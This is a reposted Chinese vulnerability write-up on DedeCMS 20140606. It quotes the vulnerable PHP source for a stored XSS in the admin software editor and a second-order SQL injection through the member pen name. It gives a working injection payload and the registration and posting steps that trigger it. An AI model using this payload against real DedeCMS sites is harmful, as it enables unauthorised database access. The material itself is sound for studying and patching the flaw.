紅色目錄有exp，注入比較雞肋

目錄

dede/soft_edit.php, 存儲型XSS漏洞? ? ? ? 2

include /memberlogin.class.php 會員筆名二次注入? ? ? ? 4

dede/soft_edit.php, 存儲型XSS漏洞

[php]

/**

* 軟件編輯

*

* @version? ?? ???$Id: soft_edit.php 1 16:09 2010年7月20日Z tianya $

*?@package? ?? ???DedeCMS.Administrator

* @copyright? ?? ?Copyright (c) 2007 - 2010, DesDev, Inc.

* @license? ?? ???http://help.dedecms.com/usersguide/license.html

* @link? ?? ?? ???http://www.dedecms.com

*/

require_once(dirname(__FILE__)."/config.php");

CheckPurview('a_Edit,a_AccEdit,a_MyEdit');

require_once(DEDEINC."/customfields.func.php");

require_once(DEDEADMIN."/inc/inc_archives_functions.php");

if(empty($dopost)) $dopost = '';

if($dopost!='save')

{

require_once(DEDEADMIN."/inc/inc_catalog_options.php");

require_once(DEDEINC."/dedetag.class.php");

ClearMyAddon();

$aid = preg_replace("#[^0-9]#", '', $aid);

$channelid="3";

//讀取歸檔信息

$arcQuery = "SELECT

#@__channeltype.typename as channelname,

#@__arcrank.membername as rankname,

#@__archives.*

FROM #@__archives

LEFT JOIN #@__channeltype ON #@__channeltype.id=#@__archives.channel

LEFT JOIN #@__arcrank ON #@__arcrank.rank=#@__archives.arcrank

WHERE #@__archives.id='$aid'";

$dsql->SetQuery($arcQuery);

$arcRow = $dsql->GetOne($arcQuery);

if(!is_array($arcRow))

{

ShowMsg("讀取檔案基本信息出錯!","-1");

exit();

}

$query = "SELECT * FROM `#@__channeltype` WHERE id='".$arcRow['channel']."'";

$cInfos = $dsql->GetOne($query);

if(!is_array($cInfos))

{

ShowMsg("讀取頻道配置信息出錯!","javascript:;");

exit();

}

$addtable = $cInfos['addtable'];

$addQuery = "SELECT * FROM `$addtable` WHERE aid='$aid'";

$addRow = $dsql->GetOne($addQuery);

$newRowStart = 1;

$nForm = '';

$daccess = $addRow['daccess'];

$needmoney = $addRow['needmoney'];

if($addRow['softlinks'] != '')

{

$dtp = new DedeTagParse();

$dtp->LoadSource($addRow['softlinks']);

if(is_array($dtp->CTags))

{

foreach($dtp->CTags as $ctag)

{

if($ctag->GetName()=='link')

{

$islocal = $ctag->GetAtt('islocal');

if($islocal != 1) $needmsg = "刪除";

else $needmsg = '';

$nForm .= "

軟件地址{$newRowStart}：

服務器名稱：

$needmsg

\r\n";

$newRowStart++;

}

}

}

$dtp->Clear();

}

$channelid = $arcRow['channel'];

$tags = GetTags($aid);

$arcRow= $arcRow;$addRow= $addRow;

include DedeInclude("templets/soft_edit.htm");

exit();

}

[/php]

發布軟件軟件介紹處過濾不嚴

軟件詳情，點擊源碼編輯

[php][/php]

include /memberlogin.class.php 會員筆名二次注入

注冊用戶筆名處注入

利用條件開啟會員注冊

[php]function FormatUsername($username)

{

$username = str_replace("`","‘",$username);

$username = str_replace("'","‘",$username);

$username = str_replace("\"","“",$username);

$username = str_replace(",","，",$username);

$username = str_replace("(","(",$username);

$username = str_replace(")",")",$username);

return addslashes($username);

}

$this->M_UserName = $this->fields['uname'];

[/php]

登陸函數

[php]function __construct($kptime = -1, $cache=FALSE)

{

global $dsql;

if($kptime==-1){

$this->M_KeepTime = 3600 * 24 * 7;

}else{

$this->M_KeepTime = $kptime;

}

$formcache = FALSE;

$this->M_ID = $this->GetNum(GetCookie("DedeUserID"));

$this->M_LoginTime = GetCookie("DedeLoginTime");

$this->fields = array();

$this->isAdmin = FALSE;

if(empty($this->M_ID))

{

$this->ResetUser();

}else{

$this->M_ID = intval($this->M_ID);

if ($cache)

{

$this->fields = GetCache($this->memberCache, $this->M_ID);

if( empty($this->fields) )

{

$this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");

} else {

$formcache = TRUE;

}

} else {

$this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");

}

if(is_array($this->fields)){

#api{{

if(defined('UC_API') && @include_once DEDEROOT.'/uc_client/client.php')

{

if($data = uc_get_user($this->fields['userid']))

{

if(uc_check_avatar($data[0]) && !strstr($this->fields['face'],UC_API))

{

$this->fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&size=middle';

$dsql->ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this->fields['face']."' WHERE `mid`='{$this->M_ID}'");

}

}

}

#/aip}}

//間隔一小時更新一次用戶登錄時間

if(time() - $this->M_LoginTime > 3600)

{

$dsql->ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this->fields['mid']."';");

PutCookie("DedeLoginTime",time(),$this->M_KeepTime);

}

$this->M_LoginID = $this->fields['userid'];

$this->M_MbType = $this->fields['mtype'];

$this->M_Money = $this->fields['money'];

$this->M_UserName = $this->fields['uname'];

$this->M_Scores = $this->fields['scores'];

$this->M_Face = $this->fields['face'];

$this->M_Rank = $this->fields['rank'];

$this->M_Spacesta = $this->fields['spacesta'];

$sql = "Select titles From #@__scores where integral<={$this->fields['scores']} order by integral desc";

$scrow = $dsql->GetOne($sql);

$this->fields['honor'] = $scrow['titles'];

$this->M_Honor = $this->fields['honor'];

if($this->fields['matt']==10) $this->isAdmin = TRUE;

$this->M_UpTime = $this->fields['uptime'];

$this->M_ExpTime = $this->fields['exptime'];

$this->M_JoinTime = MyDate('Y-m-d',$this->fields['jointime']);

if($this->M_Rank>10 && $this->M_UpTime>0){

$this->M_HasDay = $this->Judgemember();

}

if( !$formcache )

{

SetCache($this->memberCache, $this->M_ID, $this->fields, 1800);

}

}else{

$this->ResetUser();

}

}

}

[/php]

登陸后

[php]? ?/**

*??記錄會員操作日志

*

* @access? ? public

* @param? ???string??$type 記錄類型

* @param? ???string??$title 記錄標題

* @param? ???string??$note記錄描述

* @param? ???string??$aid涉及到的內容的id

* @return? ? string

*/

造成注入

會員動態表，

function RecordFeeds($type, $title, $note, $aid)

{

global $dsql,$cfg_mb_feedcheck;

//確定是否需要記錄

if (in_array($type,array('add','addsoft','feedback','addfriends','stow'))){

$ntime = time();

$title = htmlspecialchars(cn_substrR($title,255));

if(in_array($type,array('add','addsoft','feedback','stow')))

{

$rcdtype = array('add'=>' 成功發布了', 'addsoft'=>' 成功發布了軟件',

'feedback'=>' 評論了文章','stow'=>' 收藏了');

//內容發布處理

$arcrul = " ".$title."";

$title = htmlspecialchars($rcdtype[$type].$arcrul, ENT_QUOTES);

} else if ($type == 'addfriends')

{

//添加好友處理

$arcrul = " ".$aid."";

$title = htmlspecialchars(' 與'. $arcrul."成為好友", ENT_QUOTES);

}

$note = Html2Text($note);

$aid = (isset($aid) && is_numeric($aid) ? $aid : 0);

$ischeck = ($cfg_mb_feedcheck == 'Y')? 0 : 1;

$query = "INSERT INTO `#@__member_feed` (`mid`, `userid`, `uname`, `type`, `aid`, `dtime`,`title`, `note`, `ischeck`)

Values('$this->M_ID', '$this->M_LoginID', '$this->M_UserName'/*二次注入到這里*/, '$type', '$aid', '$ntime', '$title', '$note', '$ischeck'); ";

$rs = $dsql->ExecuteNoneQuery($query);

return $rs;

} else {

return FALSE;

}

}

[/php]

用戶筆名長度：

[php]if(strlen($userid) > 20 || strlen($uname) > 36)

{

ShowMsg('你的用戶名或用戶筆名過長，不允許注冊！', '-1');

exit();

}

[/php]

注冊用戶筆名

exp:

',1,3,1,1,VERsion(),1),(1,1,'1

發表文章，任意

進入會員中心，點擊我的動態

總結

以上是生活随笔為你收集整理的二次注入 php,dedecms20140606 二次注入+存储型xss的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。